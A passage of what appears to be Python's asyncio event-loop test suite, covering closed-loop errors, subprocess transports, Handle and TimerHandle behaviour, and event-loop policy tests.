self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
